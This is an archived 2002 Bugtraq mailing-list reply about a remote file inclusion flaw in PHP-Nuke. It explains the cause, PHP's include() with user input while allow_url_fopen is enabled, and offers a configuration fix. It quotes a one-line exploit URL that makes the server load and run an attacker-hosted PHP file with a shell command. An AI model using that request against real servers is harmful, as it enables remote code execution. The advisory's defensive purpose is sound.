[23924] in bugtraq
Re: PHP-Nuke allows Command Execution & Much more
daemon@ATHENA.MIT.EDU (truff)
Tue Jan 22 00:01:51 2002
Message-ID: <3C4C1B01.FEF66E24@ifrance.com>
Date: Mon, 21 Jan 2002 14:43:29 +0100
From: truff <truff@ifrance.com>
Reply-To: truff@projet7.org
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
>Hi All!
>
> I've found a serious security flaw in PHP-Nuke.
> It allows user to execute any PHP code.
> .....
> Then just requesting
http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al
> .......
Hello,
I used to find this flaw in a lot of _home made_ scripts. This is
due to the use of the include() function with user passed parameters,
and it is not particular to phpnuke. It exists in a lot of scripts cause
the php default config allows to pass http:// and ftp:// parameters to
functions like include().
As it is said in the php manual:
"As long as support for the "URL fopen wrapper" is enabled when you
configure PHP (which it is unless you explicitly
pass the --disable-url-fopen-wrapper flag to configure (for versions up
to 4.0.3) or set allow_url_fopen to off in
php.ini (for newer versions)), you can use HTTP and FTP URLs with most
functions that take a filename as a
parameter, including the require() and include() statements."
Quick Fix:
Just set allow_url_fopen to off in php.ini .
- www.projet7.org - Security Researchs
______________________________________________________________________________
ifrance.com, l'email gratuit le plus complet de l'Internet !
vos emails depuis un navigateur, en POP3, sur Minitel, sur le WAP...
http://www.ifrance.com/_reloc/email.emailif
